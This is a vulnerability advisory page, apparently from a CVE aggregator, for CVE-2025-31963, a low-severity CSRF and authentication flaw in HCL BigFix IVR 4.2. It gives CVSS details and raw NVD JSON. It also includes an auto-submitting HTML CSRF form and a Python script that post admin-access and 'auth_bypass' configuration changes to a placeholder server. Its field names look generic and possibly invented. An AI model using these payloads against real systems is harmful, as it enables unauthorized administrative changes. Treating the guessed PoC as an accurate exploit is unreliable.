Security Vulnerability Report
CVE-2025-31963 CVSS 2.9 LOW

CVE-2025-31963

Published: 2026-01-07 12:17:02
Last Modified: 2026-01-22 13:45:29

Description

Improper authentication and missing CSRF protection in the local setup interface component in HCL BigFix IVR version 4.2 allows a local attacker to perform unauthorized configuration changes via unauthenticated administrative configuration requests.

CVSS Details

CVSS Score: 2.9
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_insights_for_vulnerability_remediation:4.2:*:*:*:*:*:*:* - VULNERABLE
HCL BigFix IVR version 4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-31963 -->
<!-- This PoC demonstrates the CSRF vulnerability in HCL BigFix IVR -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF PoC - CVE-2025-31963</title>
</head>
<body>
  <h1>CVE-2025-31963 CSRF PoC</h1>
  <p>This PoC demonstrates the missing CSRF protection in HCL BigFix IVR local setup interface.</p>
  <!-- Malicious configuration change request -->
  <form id="csrfForm" action="https://target-server/ivr/setup/configure" method="POST" enctype="application/x-www-form-urlencoded">
    <input type="hidden" name="action" value="update_config">
    <input type="hidden" name="config_param" value="admin_access">
    <input type="hidden" name="config_value" value="enabled">
    <!-- Other malicious configuration parameters -->
    <input type="hidden" name="auth_bypass" value="true">
  </form>
  <script>
    // Auto-submit the form when page loads
    document.getElementById('csrfForm').submit();
    console.log('CSRF request sent');
  </script>
  <p>If you see this message, the request has been sent.</p>
</body>
</html>

Python PoC for testing authentication bypass

python
import requests

TARGET_URL = "https://target-server/ivr/setup/configure"

# Same configuration-change request as the HTML form above
PAYLOAD = {
    "action": "update_config",
    "config_param": "admin_access",
    "config_value": "malicious_value",
    "auth_bypass": "true",
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0",
}

response = requests.post(TARGET_URL, data=PAYLOAD, headers=headers)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127753 (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-31963",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-07T12:17:01.863",
    "lastModified": "2026-01-22T13:45:28.607",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper authentication and missing CSRF protection in the local setup interface component in HCL BigFix IVR version 4.2 allows a local attacker to perform unauthorized configuration changes via unauthenticated administrative configuration requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 2.9,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 0.3,
          "impactScore": 2.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 3.3,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-306"},
          {"lang": "en", "value": "CWE-352"}
        ]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-352"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hcltech:bigfix_insights_for_vulnerability_remediation:4.2:*:*:*:*:*:*:*",
                "matchCriteriaId": "0CDB58BE-0D8B-4F78-8D21-0B9B70D2B5A0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127753",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}